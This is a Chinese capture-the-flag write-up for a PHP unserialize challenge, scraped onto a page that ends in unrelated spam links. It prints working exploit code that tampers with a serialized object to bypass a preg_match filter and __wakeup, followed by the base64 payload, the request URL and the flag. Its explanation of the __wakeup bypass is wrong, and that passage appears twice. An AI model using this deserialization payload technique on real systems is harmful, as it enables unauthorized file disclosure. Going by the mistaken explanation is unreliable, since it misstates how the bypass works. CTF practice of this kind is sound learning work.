当前位置: 首页 > news >正文

网站建设被骗维护费上海定制网站开发营销推广

网站建设被骗维护费,上海定制网站开发营销推广,网站备案ip地址,郑州市新闻发布会1、题目描述 2、 3、分析代码 class Demo { private $file fl4g.php; }:定义了一个名为Demo的类,该类有一个私有属性$file,默认值为fl4g.php。 $a serialize(new Demo);:创建了一个Demo类的实例,并对其进行序列化&a…

1、题目描述

2、

3、分析代码

  1. class Demo { private $file = 'fl4g.php'; }:定义了一个名为Demo的类,该类有一个私有属性$file,默认值为fl4g.php

  2. $a = serialize(new Demo);:创建了一个Demo类的实例,并对其进行序列化,然后将序列化后的字符串赋值给变量$a

  3. $a = str_replace('O:4', 'O:+4',$a);:这行代码的目的是绕过preg_match('/[oc]:\d+:/i', $var)这样的正则表达式检查。原始的序列化字符串中,O:4表示的是一个对象,后面的数字4表示类名的长度。通过将4替换为+4,可以使正则表达式无法匹配,从而绕过检查。

  4. $a = str_replace(':1:', ':2:',$a);:这行代码的目的是绕过__wakeup()函数的检查。在__wakeup()函数中,如果$this->file的值不等于index.php,就会被重置为index.php。通过将序列化字符串中的:1:替换为:2:,可以使$this->file的值始终等于index.php,从而绕过检查。

  5. echo base64_encode($a);:最后,将修改后的序列化字符串进行Base64编码,然后输出。

4、根据代码中的提示,我们将fl4g.php进行base64编码后的值传给var,试着访问但是页面没有回显

5、根据题目我们需要进行序列化(代码引用这篇文章:攻防世界之Web_php_unserialize(超详细WP)_php unserialize-CSDN博客)

6、在源代码中我们需要绕过几个函数

<?php
class Demo { private $file = 'fl4g.php';
}
$a = serialize(new Demo);
$a = str_replace('O:4', 'O:+4',$a); //绕过preg_match()函数
$a = str_replace(':1:', ':2:',$a); //绕过__wakeup()函数
echo ($a);                  
?>

7、运行代码可以看到序列后的结果

O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}

将a的值进行编码

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== 

8、

  1. class Demo { private $file = 'fl4g.php'; }:定义了一个名为Demo的类,该类有一个私有属性$file,默认值为fl4g.php

  2. $a = serialize(new Demo);:创建了一个Demo类的实例,并对其进行序列化,然后将序列化后的字符串赋值给变量$a

  3. $a = str_replace('O:4', 'O:+4',$a);:这行代码的目的是绕过preg_match('/[oc]:\d+:/i', $var)这样的正则表达式检查。原始的序列化字符串中,O:4表示的是一个对象,后面的数字4表示类名的长度。通过将4替换为+4,可以使正则表达式无法匹配,从而绕过检查。

  4. $a = str_replace(':1:', ':2:',$a);:这行代码的目的是绕过__wakeup()函数的检查。在__wakeup()函数中,如果$this->file的值不等于index.php,就会被重置为index.php。通过将序列化字符串中的:1:替换为:2:,可以使$this->file的值始终等于index.php,从而绕过检查。

  5. echo base64_encode($a);:最后,将修改后的序列化字符串进行Base64编码,然后输出。

 

9、访问url:61.147.171.105:65034/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

10、

ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

http://www.yayakq.cn/news/659168/

相关文章:

  • 江苏建设监理协会网站企业网站开发模型图
  • 网站开发德菁买购网中国10大品牌网
  • 网站后期的维护和更新厦门满山红网站建设
  • 重庆教育建设集团有限公司网站抄袭网站
  • 商业网站建设实列什么网站做风险投资
  • 烟台广告公司南网站建设评价搜狗网站收录
  • 石泉政协网站建设方案王占军
  • 网站开发估价wordpress搭建子网站
  • 功能网站首页模板建设网站的合约
  • 网站开发手机编译器赣州瑞金网站建设
  • php 上传移动到网站根目录不花钱的网站建设
  • 网站设计开发文档模板下载dw怎么做网站的导航栏
  • 烟台建设用地规划查询网站横沥网站设计
  • 栾城seo整站排名成都装修公司哪家实惠
  • 搭设企业网站教程深圳专业高端网站建设费用
  • 公司网站有收录没排名小程序开发制作需要多少钱
  • 哪个公司做网站便宜网站建设洽谈方案
  • 滕州住房城乡建设局网站招标网站开发文档
  • 网站开发流程莆田固定ip做网站和域名区别
  • 网站排名效果好口碑营销有哪些
  • 航天基地规划建设局网站电商数据网站有哪些
  • 徐州公司网站建设wordpress主题的文件在哪个文件夹
  • 移动网站开发百度百科手机端网站的区别吗
  • 如何把网站做的更好北京南站到北京西站
  • 如何为网站做优化门户网站源码入驻
  • 做外贸网站一般多少钱合肥360seo排名
  • 江苏系统建站怎么用wordpress 模板带数据
  • 个人网站认证2010年青海省建设厅网站
  • 建站推广免费公司济南快速网站排名
  • 做设计时可以参考的网站大型网站建设